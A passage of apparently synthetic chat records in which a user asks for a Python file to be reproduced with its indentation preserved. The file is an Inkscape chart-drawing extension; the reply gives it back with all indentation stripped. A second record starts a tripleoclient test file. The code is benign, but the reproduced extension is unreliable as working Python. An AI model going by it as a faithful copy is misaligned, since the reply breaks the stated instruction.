'arc')\n\t\t\t\tpieslice.set(inkex.addNS('cx', 'sodipodi'), str(width/2))\n\t\t\t\tpieslice.set(inkex.addNS('cy', 'sodipodi'), str(height/2))\n\t\t\t\tpieslice.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))\n\t\t\t\tpieslice.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))\n\t\t\t\tpieslice.set(inkex.addNS('start', 'sodipodi'), str(offset))\n\t\t\t\tpieslice.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))\n\t\t\t\tpieslice.set(\"style\",\"fill:\"+Colors[color%color_count]+\";stroke:none;fill-opacity:1\")\n\t\t\t\t\n\t\t\t\t#If text is given, draw short paths and add the text\n\t\t\t\tif(keys_present):\n\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\tpath.set(\"d\",\"m \"+str((width/2)+pie_radius*math.cos(angle/2+offset))+\",\"+str((height/2)+pie_radius*math.sin(angle/2+offset))+\" \"+str((text_offset-2)*math.cos(angle/2+offset))+\",\"+str((text_offset-2)*math.sin(angle/2+offset)))\n\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\tlayer.append(path)\n\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\ttext.set(\"x\", str((width/2)+(pie_radius+text_offset)*math.cos(angle/2+offset)))\n\t\t\t\t\ttext.set(\"y\", str((height/2)+(pie_radius+text_offset)*math.sin(angle/2+offset)+font_size/3))\n\t\t\t\t\ttextstyle=\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color\n\t\t\t\t\t#check if it is right or left of the Pie\n\t\t\t\t\tif(math.cos(angle/2+offset)>0):\n\t\t\t\t\t\ttext.set(\"style\",textstyle)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttext.set(\"style\",textstyle+\";text-align:end;text-anchor:end\")\n\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\tif show_values:\n\t\t\t\t\t\ttext.text=text.text+\"(\"+str(values[cnt])\n\n\t\t\t\t\t\tif pie_abs:\n\t\t\t\t\t\t\ttext.text=text.text+\" %\"\n\t\t\t\t\t\t\n\t\t\t\t\t\ttext.text=text.text+\")\"\n\t\t\t\t\t\n\t\t\t\t\tcnt=cnt+1\n\t\t\t\t\tlayer.append(text)\n\t\t\t\t\n\t\t\t\t#increase the rotation-offset and the colorcycle-position\n\t\t\t\toffset=offset+angle\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t\n\t\t\t\t#append the objects to the extension-layer\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(pieslice)\n\t\telif(charttype==\"stbar\"):\n\t\t#################\n\t\t###STACKED BAR###\n\t\t#################\n\t\t\t# Iterate all values to draw the different slices\n\t\t\tcolor=0\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t\n\t\t\t#create value sum in order to divide the bars\n\t\t\ttry:\n\t\t\t\tvaluesum=sum(values)\n\t\t\texcept ValueError:\n\t\t\t\tvaluesum=0.0\n\n\t\t\tfor value in values:\n\t\t\t\tvaluesum=valuesum+float(value)\n\t\t\t\n\t\t\t# Init offset\n\t\t\toffset=0\n\t\t\ti=len(values)-1 #loopcounter\n\t\t\t# Draw Single bars with their shadows\n\t\t\tfor value in values:\n\t\t\t\t\n\t\t\t\t# Calculate the individual heights normalized on 100units\n\t\t\t\tnormedvalue=(bar_height/valuesum)*float(value)\n\t\t\t\t\n\t\t\t\tif(draw_blur):\n\t\t\t\t\t# Create rectangle element\n\t\t\t\t\tshadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\t\t# Set chart position to center of document.\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + 1))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 - offset - (normedvalue)+1)) \n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + 1 + offset))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 +1))\n\t\t\t\t\t# Set rectangle properties\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set(\"width\",str(bar_width))\n\t\t\t\t\t\tshadow.set(\"height\", str((normedvalue)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set(\"width\",str((normedvalue)))\n\t\t\t\t\t\tshadow.set(\"height\", str(bar_width))\n\t\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t# Create rectangle element\n\t\t\t\trect = inkex.etree.Element(inkex.addNS('rect','svg'))\n\t\t\t\t\n\t\t\t\t# Set chart position to center of document.\n\t\t\t\tif( not rotate ):\n\t\t\t\t\trect.set('x', str(width / 2 ))\n\t\t\t\t\trect.set('y', str(height / 2 - offset - (normedvalue)))\n\t\t\t\telse:\n\t\t\t\t\trect.set('x', str(width / 2 + offset ))\n\t\t\t\t\trect.set('y', str(height / 2 ))\n\t\t\t\t# Set rectangle properties\n\t\t\t\tif( not rotate ):\n\t\t\t\t\trect.set(\"width\", str(bar_width))\n\t\t\t\t\trect.set(\"height\", str((normedvalue)))\n\t\t\t\telse:\n\t\t\t\t\trect.set(\"height\", str(bar_width))\n\t\t\t\t\trect.set(\"width\", str((normedvalue)))\n\t\t\t\trect.set(\"style\",\"fill:\"+Colors[color%color_count])\n\t\t\t\t\n\t\t\t\t#If text is given, draw short paths and add the text\n\t\t\t\tif(keys_present):\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\t\tpath.set(\"d\",\"m \"+str((width+bar_width)/2)+\",\"+str(height / 2 - offset - (normedvalue / 2))+\" \"+str(bar_width/2+text_offset)+\",0\")\n\t\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\t\tlayer.append(path)\n\t\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\t\ttext.set(\"x\", str(width/2+bar_width+text_offset+1))\n\t\t\t\t\t\ttext.set(\"y\", str(height / 2 - offset + font_size/3 - (normedvalue / 2)))\n\t\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color)\n\t\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\t\tcnt=cnt+1\n\t\t\t\t\t\tlayer.append(text)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\t\tpath.set(\"d\",\"m \"+str((width)/2+offset+normedvalue/2)+\",\"\n\t\t\t\t\t\t\t+str(height / 2 + bar_width/2)\n\t\t\t\t\t\t\t+\" 0,\"+str(bar_width/2+(font_size*i)+text_offset)) #line\n\t\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\t\tlayer.append(path)\n\t\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\t\ttext.set(\"x\", str((width)/2+offset+normedvalue/2-font_size/3))\n\t\t\t\t\t\ttext.set(\"y\", str((height/2)+bar_width+(font_size*(i+1))+text_offset ))\n\t\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color)\n\t\t\t\t\t\ttext.text=keys[color]\n\t\t\t\t\t\tlayer.append(text)\n\t\t\t\t\n\t\t\t\t# Increase Offset and Color\n\t\t\t\toffset=offset+normedvalue\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t\n\t\t\t\t# Connect elements together.\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(rect)\n\t\t\t\t\n\t\t\t\ti-=1 #loopcounter\n\t\n\tdef getUnittouu(self, param):\n\t#compatibility wrapper\n\t try:\n\t return inkex.unittouu(param)\n\t except AttributeError:\n\t return self.unittouu(param)\n\n# Create effect instance and apply it.\neffect = NiceChart()\neffect.affect()\n```<|memory_end|>\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
# nicechart.py
#
# Copyright 2011
#
# Christoph Sterz
# Florian Weber
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# These two lines are only needed if you don't put the script directly into
# the installation directory
import sys
#sys.path.append('/usr/share/inkscape/extensions')
# We will use the inkex module with the predefined Effect base class.
import inkex
# The simplestyle module provides functions for style parsing.
from simplestyle import *
import math, re, nicechart_colors as nc_colors
class NiceChart(inkex.Effect):
"""
Example Inkscape effect extension.
Creates a new layer with a "Hello World!" text centered in the middle of the document.
"""
def __init__(self):
"""
Constructor.
Defines the "--what" option of a script.
"""
# Call the base class constructor.
inkex.Effect.__init__(self)
# Define string option "--what" with "-w" shortcut and default chart values.
self.OptionParser.add_option('-w', '--what', action = 'store',
type = 'string', dest = 'what', default = '22,11,67',
help = 'Chart Values')
# Define string option "--type" with "-t" shortcut.
self.OptionParser.add_option("-t", "--type", action="store",
type="string", dest="type", default='',
help="Chart Type")
# Define bool option "--blur" with "-b" shortcut.
self.OptionParser.add_option("-b", "--blur", action="store",
type="inkbool", dest="blur", default='True',
help="Blur Type")
# Define string option "--file" with "-f" shortcut.
self.OptionParser.add_option("-f", "--filename", action="store",
type="string", dest="filename", default='',
help="Name of File")
# Define string option "--input_type" with "-i" shortcut.
self.OptionParser.add_option("-i", "--input_type", action="store",
type="string", dest="input_type", default='file',
help="Chart Type")
# Define string option "--delimiter" with "-d" shortcut.
self.OptionParser.add_option("-d", "--delimiter", action="store",
type="string", dest="csv_delimiter", default=';',
help="delimiter")
# Define string option "--colors" with "-c" shortcut.
self.OptionParser.add_option("-c", "--colors", action="store",
type="string", dest="colors", default='default',
help="color-scheme")
# Define string option "--colors_override"
self.OptionParser.add_option("", "--colors_override", action="store",
type="string", dest="colors_override", default='',
help="color-scheme-override")
self.OptionParser.add_option("", "--reverse_colors", action="store",
type="inkbool", dest="reverse_colors", default='False',
help="reverse color-scheme")
self.OptionParser.add_option("-k", "--col_key", action="store",
type="int", dest="col_key", default='0',
help="column that contains the keys")
self.OptionParser.add_option("-v", "--col_val", action="store",
type="int", dest="col_val", default='1',
help="column that contains the values")
self.OptionParser.add_option("-r", "--rotate", action="store",
type="inkbool", dest="rotate", default='False',
help="Draw barchart horizontally")
self.OptionParser.add_option("-W", "--bar-width", action="store",
type="int", dest="bar_width", default='10',
help="width of bars")
self.OptionParser.add_option("-p", "--pie-radius", action="store",
type="int", dest="pie_radius", default='100',
help="radius of pie-charts")
self.OptionParser.add_option("-H", "--bar-height", action="store",
type="int", dest="bar_height", default='100',
help="height of bars")
self.OptionParser.add_option("-O", "--bar-offset", action="store",
type="int", dest="bar_offset", default='5',
help="distance between bars")
self.OptionParser.add_option("", "--stroke-width", action="store",
type="int", dest="stroke_width", default='2')
self.OptionParser.add_option("-o", "--text-offset", action="store",
type="int", dest="text_offset", default='5',
help="distance between bar and descriptions")
self.OptionParser.add_option("-F", "--font", action="store",
type="string", dest="font", default='sans-serif',
help="font of description")
self.OptionParser.add_option("-S", "--font-size", action="store",
type="int", dest="font_size", default='10',
help="font size of description")
self.OptionParser.add_option("-C", "--font-color", action="store",
type="string", dest="font_color", default='black',
help="font color of description")
#Dummy:
self.OptionParser.add_option("","--input_sections")
self.OptionParser.add_option("-V", "--show_values", action="store",
type="inkbool", dest="show_values", default='False',
help="Show values in chart")
def effect(self):
"""
Effect behaviour.
Overrides base class' method and inserts a nice looking chart into SVG document.
"""
# Get script's "--what" option value and process the data type --- i concess the if term is a little bit of magic
what = self.options.what
keys=[]
values=[]
orig_values=[]
keys_present=True
pie_abs=False
cnt=0
csv_file_name=self.options.filename
csv_delimiter=self.options.csv_delimiter
input_type=self.options.input_type
col_key=self.options.col_key
col_val=self.options.col_val
show_values=self.options.show_values
if(input_type=="\"file\""):
csv_file=open(csv_file_name,"r")
for line in csv_file:
value=line.split(csv_delimiter)
if(len(value)>=1): #make sure that there is at least one value (someone may want to use it as description)
keys.append(value[col_key])
values.append(float(value[col_val]))
csv_file.close()
elif(input_type=="\"direct_input\""):
what=re.findall("([A-Z|a-z|0-9]+:[0-9]+\.?[0-9]*)",what)
for value in what:
value=value.split(":")
keys.append(value[0])
values.append(float(value[1]))
# Get script's "--type" option value.
charttype=self.options.type
if(charttype=="pie_abs"):
pie_abs=True
charttype="pie"
# Get access to main SVG document element and get its dimensions.
svg = self.document.getroot()
# Get the page attibutes:
width = self.getUnittouu(svg.get('width'))
height = self.getUnittouu(svg.attrib['height'])
# Create a new layer.
layer = inkex.etree.SubElement(svg, 'g')
layer.set(inkex.addNS('label', 'inkscape'), 'Chart-Layer: %s' % (what))
layer.set(inkex.addNS('groupmode', 'inkscape'), 'layer')
# Check if Blur should be drawn:
draw_blur=self.options.blur
#draw_blur=False
# Set Default Colors
self.options.colors_override.strip()
if (len(self.options.colors_override)>0):
Colors=self.options.colors_override
else:
Colors=self.options.colors
if(Colors[0].isalpha()):
Colors=nc_colors.get_color_scheme(Colors)
else:
Colors=re.findall("(#[0-9a-fA-F]{6})",Colors)
#to be sure we create a fallback:
if(len(Colors)==0):
Colors=nc_colors.get_color_scheme()
color_count=len(Colors)
if(self.options.reverse_colors):
Colors.reverse()
#Those values should be self-explaining:
bar_height=self.options.bar_height
bar_width=self.options.bar_width
bar_offset=self.options.bar_offset
#offset of the description in stacked-bar-charts:
#stacked_bar_text_offset=self.options.stacked_bar_text_offset
text_offset=self.options.text_offset
#get font
font=self.options.font
font_size=self.options.font_size
font_color=self.options.font_color
#get rotation
rotate = self.options.rotate
pie_radius=self.options.pie_radius
stroke_width=self.options.stroke_width
if(charttype=="bar"):
#########
###BAR###
#########
#iterate all values, use offset to draw the bars in different places
offset=0
color=0
# Normalize the bars to the largest value
try:
value_max=max(values)
except ValueError:
value_max=0.0
for x in range(len(values)):
orig_values.append(values[x])
values[x]=(values[x]/value_max)*bar_height
# Get defs of Document
defs = self.xpathSingle('/svg:svg//svg:defs')
if defs == None:
defs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))
# Create new Filter
filt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))
filtId = self.uniqueId('filter')
self.filtId = 'filter:url(#%s);' % filtId
for k, v in [('id', filtId), ('height', "3"),
('width', "3"),
('x', '-0.5'), ('y', '-0.5')]:
filt.set(k, v)
# Append Gaussian Blur to that Filter
fe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))
fe.set('stdDeviation', "1.1")
# Draw Single bars with their shadows
for value in values:
#draw blur, if it is wanted
if(draw_blur):
# Create shadow element
shadow = inkex.etree.Element(inkex.addNS("rect","svg"))
# Set chart position to center of document. Make it horizontal or vertical
if(not rotate):
shadow.set('x', str(width / 2 + offset +1))
shadow.set('y', str(height / 2 - int(value)+1))
else:
shadow.set('y', str(width / 2 + offset +1))
shadow.set('x', str(height / 2 +1))
# Set shadow properties
if(not rotate):
shadow.set("width", str(bar_width))
shadow.set("height", str(int(value)))
else:
shadow.set("height", str(bar_width))
shadow.set("width", str(int(value)))
# Set shadow blur (connect to filter object in xml path)
shadow.set("style","filter:url(#filter)")
# Create rectangle element
#shadow = inkex.etree.Element(inkex.addNS("rect","svg"))
rect = inkex.etree.Element(inkex.addNS('rect','svg'))
# Set chart position to center of document.
if(not rotate):
rect.set('x', str(width/2+offset))
rect.set('y', str(height/2-int(value)))
else:
rect.set('y', str(width/2+offset))
rect.set('x', str(height/2))
# Set rectangle properties
if(not rotate):
rect.set("width", str(bar_width))
rect.set("height", str(int(value)))
else:
rect.set("height", str(bar_width))
rect.set("width", str(int(value)))
rect.set("style","fill:"+Colors[color%color_count])
# Set shadow blur (connect to filter object in xml path)
if(draw_blur):
shadow.set("style","filter:url(#filter)")
# If keys are given create text elements
if(keys_present):
text = inkex.etree.Element(inkex.addNS('text','svg'))
if(not rotate): #=vertical
text.set("transform","matrix(0,-1,1,0,0,0)")
#y after rotation:
text.set("x", "-"+str(height/2+text_offset))
#x after rotation:
text.set("y", str(width/2+offset+bar_width/2+font_size/3))
else: #=horizontal
text.set("y", str(width/2+offset+bar_width/2+font_size/3))
text.set("x", str(height/2-text_offset))
text.set("style","font-size:"+str(font_size)\
+"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:"\
+font+";-inkscape-font-specification:Bitstream Charter;text-align:end;text-anchor:end;fill:"\
+font_color)
text.text=keys[cnt]
#cnt=cnt+1
# Increase Offset and Color
#offset=offset+bar_width+bar_offset
color=(color+1)%8
# Connect elements together.
if(draw_blur):
layer.append(shadow)
layer.append(rect)
if(keys_present):
layer.append(text)
if(show_values):
vtext = inkex.etree.Element(inkex.addNS('text','svg'))
if(not rotate): #=vertical
vtext.set("transform","matrix(0,-1,1,0,0,0)")
#y after rotation:
vtext.set("x", "-"+str(height/2+text_offset-value-text_offset-text_offset))
#x after rotation:
vtext.set("y", str(width/2+offset+bar_width/2+font_size/3))
else: #=horizontal
vtext.set("y", str(width/2+offset+bar_width/2+font_size/3))
vtext.set("x", str(height/2-text_offset+value+text_offset+text_offset))
vtext.set("style","font-size:"+str(font_size)\
+"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:"\
+font+";-inkscape-font-specification:Bitstream Charter;text-align:start;text-anchor:start;fill:"\
+font_color)
vtext.text=str(int(orig_values[cnt]))
layer.append(vtext)
cnt=cnt+1
offset=offset+bar_width+bar_offset
elif(charttype=="pie"):
#########
###PIE###
#########
# Iterate all values to draw the different slices
color=0
# Set Default Colors
# Get defs of Document
defs = self.xpathSingle('/svg:svg//svg:defs')
if defs == None:
defs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))
# Create new Filter
filt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))
filtId = self.uniqueId('filter')
self.filtId = 'filter:url(#%s);' % filtId
for k, v in [('id', filtId), ('height', "3"),
('width', "3"),
('x', '-0.5'), ('y', '-0.5')]:
filt.set(k, v)
# Append Gaussian Blur to that Filter
fe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))
fe.set('stdDeviation', "1.1")
# Add a grey background circle
background=inkex.etree.Element(inkex.addNS("circle","svg"))
background.set("cx", str(width/2))
background.set("cy", str(height/2))
background.set("r", str(pie_radius))
if pie_abs:
background.set("style","stroke:#ececec;fill:#f9f9f9")
else:
background.set("style","fill:#aaaaaa;stroke:none")
layer.append(background)
#create value sum in order to divide the slices
try:
valuesum=sum(values)
except ValueError:
valuesum=0
if pie_abs:
valuesum=100
# Set an offsetangle
offset=0
# Draw single slices with their shadow
for value in values:
# Calculate the PI-angles for start and end
angle=(2*3.141592)/valuesum*float(value)
# Create the shadow first (if it should be created):
if(draw_blur):
shadow=inkex.etree.Element(inkex.addNS("path","svg"))
shadow.set(inkex.addNS('type', 'sodipodi'), 'arc')
shadow.set(inkex.addNS('cx', 'sodipodi'), str(width/2))
shadow.set(inkex.addNS('cy', 'sodipodi'), str(height/2))
shadow.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))
shadow.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))
shadow.set(inkex.addNS('start', 'sodipodi'), str(offset))
shadow.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))
shadow.set("style","filter:url(#filter);fill:#000000")
#then add the slice
pieslice=inkex.etree.Element(inkex.addNS("path","svg"))
pieslice.set(inkex.addNS('type', 'sodipodi'), 'arc')
pieslice.set(inkex.addNS('cx', 'sodipodi'), str(width/2))
pieslice.set(inkex.addNS('cy', 'sodipodi'), str(height/2))
pieslice.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))
pieslice.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))
pieslice.set(inkex.addNS('start', 'sodipodi'), str(offset))
pieslice.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))
pieslice.set("style","fill:"+Colors[color%color_count]+";stroke:none;fill-opacity:1")
#If text is given, draw short paths and add the text
if(keys_present):
path=inkex.etree.Element(inkex.addNS("path","svg"))
path.set("d","m "+str((width/2)+pie_radius*math.cos(angle/2+offset))+","+str((height/2)+pie_radius*math.sin(angle/2+offset))+" "+str((text_offset-2)*math.cos(angle/2+offset))+","+str((text_offset-2)*math.sin(angle/2+offset)))
path.set("style","fill:none;stroke:"+font_color+";stroke-width:"+str(stroke_width)+"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1")
layer.append(path)
text = inkex.etree.Element(inkex.addNS('text','svg'))
text.set("x", str((width/2)+(pie_radius+text_offset)*math.cos(angle/2+offset)))
text.set("y", str((height/2)+(pie_radius+text_offset)*math.sin(angle/2+offset)+font_size/3))
textstyle="font-size:"+str(font_size)+"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:"+font+";-inkscape-font-specification:Bitstream Charter;fill:"+font_color
#check if it is right or left of the Pie
if(math.cos(angle/2+offset)>0):
text.set("style",textstyle)
else:
text.set("style",textstyle+";text-align:end;text-anchor:end")
text.text=keys[cnt]
if show_values:
text.text=text.text+"("+str(values[cnt])
if pie_abs:
text.text=text.text+" %"
text.text=text.text+")"
cnt=cnt+1
layer.append(text)
#increase the rotation-offset and the colorcycle-position
offset=offset+angle
color=(color+1)%8
#append the objects to the extension-layer
if(draw_blur):
layer.append(shadow)
layer.append(pieslice)
elif(charttype=="stbar"):
#################
###STACKED BAR###
#################
# Iterate all values to draw the different slices
color=0
# Get defs of Document
defs = self.xpathSingle('/svg:svg//svg:defs')
if defs == None:
defs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))
# Create new Filter
filt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))
filtId = self.uniqueId('filter')
self.filtId = 'filter:url(#%s);' % filtId
for k, v in [('id', filtId), ('height', "3"),
('width', "3"),
('x', '-0.5'), ('y', '-0.5')]:
filt.set(k, v)
# Append Gaussian Blur to that Filter
fe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))
fe.set('stdDeviation', "1.1")
#create value sum in order to divide the bars
try:
valuesum=sum(values)
except ValueError:
valuesum=0.0
for value in values:
valuesum=valuesum+float(value)
# Init offset
offset=0
i=len(values)-1 #loopcounter
# Draw Single bars with their shadows
for value in values:
# Calculate the individual heights normalized on 100units
normedvalue=(bar_height/valuesum)*float(value)
if(draw_blur):
# Create rectangle element
shadow = inkex.etree.Element(inkex.addNS("rect","svg"))
# Set chart position to center of document.
if(not rotate):
shadow.set('x', str(width / 2 + 1))
shadow.set('y', str(height / 2 - offset - (normedvalue)+1))
else:
shadow.set('x', str(width / 2 + 1 + offset))
shadow.set('y', str(height / 2 +1))
# Set rectangle properties
if(not rotate):
shadow.set("width",str(bar_width))
shadow.set("height", str((normedvalue)))
else:
shadow.set("width",str((normedvalue)))
shadow.set("height", str(bar_width))
# Set shadow blur (connect to filter object in xml path)
shadow.set("style","filter:url(#filter)")
# Create rectangle element
rect = inkex.etree.Element(inkex.addNS('rect','svg'))
# Set chart position to center of document.
if( not rotate ):
rect.set('x', str(width / 2 ))
rect.set('y', str(height / 2 - offset - (normedvalue)))
else:
rect.set('x', str(width / 2 + offset ))
rect.set('y', str(height / 2 ))
# Set rectangle properties
if( not rotate ):
rect.set("width", str(bar_width))
rect.set("height", str((normedvalue)))
else:
rect.set("height", str(bar_width))
rect.set("width", str((normedvalue)))
rect.set("style","fill:"+Colors[color%color_count])
#If text is given, draw short paths and add the text
if(keys_present):
if(not rotate):
path=inkex.etree.Element(inkex.addNS("path","svg"))
path.set("d","m "+str((width+bar_width)/2)+","+str(height / 2 - offset - (normedvalue / 2))+" "+str(bar_width/2+text_offset)+",0")
path.set("style","fill:none;stroke:"+font_color+";stroke-width:"+str(stroke_width)+"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1")
layer.append(path)
text = inkex.etree.Element(inkex.addNS('text','svg'))
text.set("x", str(width/2+bar_width+text_offset+1))
text.set("y", str(height / 2 - offset + font_size/3 - (normedvalue / 2)))
text.set("style","font-size:"+str(font_size)+"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:"+font+";-inkscape-font-specification:Bitstream Charter;fill:"+font_color)
text.text=keys[cnt]
cnt=cnt+1
layer.append(text)
else:
path=inkex.etree.Element(inkex.addNS("path","svg"))
path.set("d","m "+str((width)/2+offset+normedvalue/2)+","
+str(height / 2 + bar_width/2)
+" 0,"+str(bar_width/2+(font_size*i)+text_offset)) #line
path.set("style","fill:none;stroke:"+font_color+";stroke-width:"+str(stroke_width)+"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1")
layer.append(path)
text = inkex.etree.Element(inkex.addNS('text','svg'))
text.set("x", str((width)/2+offset+normedvalue/2-font_size/3))
text.set("y", str((height/2)+bar_width+(font_size*(i+1))+text_offset ))
text.set("style","font-size:"+str(font_size)+"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:"+font+";-inkscape-font-specification:Bitstream Charter;fill:"+font_color)
text.text=keys[color]
layer.append(text)
# Increase Offset and Color
offset=offset+normedvalue
color=(color+1)%8
# Connect elements together.
if(draw_blur):
layer.append(shadow)
layer.append(rect)
i-=1 #loopcounter
def getUnittouu(self, param):
#compatibility wrapper
try:
return inkex.unittouu(param)
except AttributeError:
return self.unittouu(param)
# Create effect instance and apply it.
effect = NiceChart()
effect.affect()
```
|
[
{
"content": "Here is the code block:\n```python\n# Copyright 2016 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport mock\n\nfrom tripleoclient.tests import fakes\nfrom tripleoclient.tests.v1.overcloud_deploy import fakes as deploy_fakes\nfrom tripleoclient.v2 import tripleo_container_image as tcib\n\n\nIMAGE_YAML = \"\"\"---\ncontainer_images:\n - image_source: \"tripleo\"\n imagename: \"test/keystone:tag\"\n\"\"\"\n\nMOCK_WALK = [\n (\"\", [\"base\"], [],),\n (\"/base\", [\"memcached\", \"openstack\"], [\"config.yaml\", \"test.doc\"],),\n (\"/base/memcached\", [], [\"memcached.yaml\"],),\n (\"/base/openstack\", [\"glance\", \"keystone\", \"neutron\", \"nova\"], [],),\n (\n \"/base/openstack/glance\",\n [],\n [\"glance-registry.yaml\", \"glance-api.yaml\"],\n ),\n (\"/base/openstack/keystone\", [], [\"keystone.yaml\"],),\n (\"/base/openstack/neutron\", [\"api\"], [],),\n (\"/base/openstack/neutron/api\", [], [\"neutron-api.yml\"],),\n (\"/base/openstack/nova\", [], [],),\n]\n\n\nclass TestContainerImages(deploy_fakes.TestDeployOvercloud):\n def setUp(self):\n super(TestContainerImages, self).setUp()\n self.app = fakes.FakeApp()\n self.os_walk = mock.patch(\n \"os.walk\", autospec=True, return_value=iter(MOCK_WALK)\n )\n self.os_walk.start()\n self.addCleanup(self.os_walk.stop)\n self.os_listdir = mock.patch(\n \"os.listdir\", autospec=True, return_value=[\"config.yaml\"]\n )\n self.os_listdir.start()\n self.addCleanup(self.os_listdir.stop)\n self.run_ansible_playbook = mock.patch(\n \"tripleoclient.utils.run_ansible_playbook\", autospec=True\n )\n self.run_ansible_playbook.start()\n 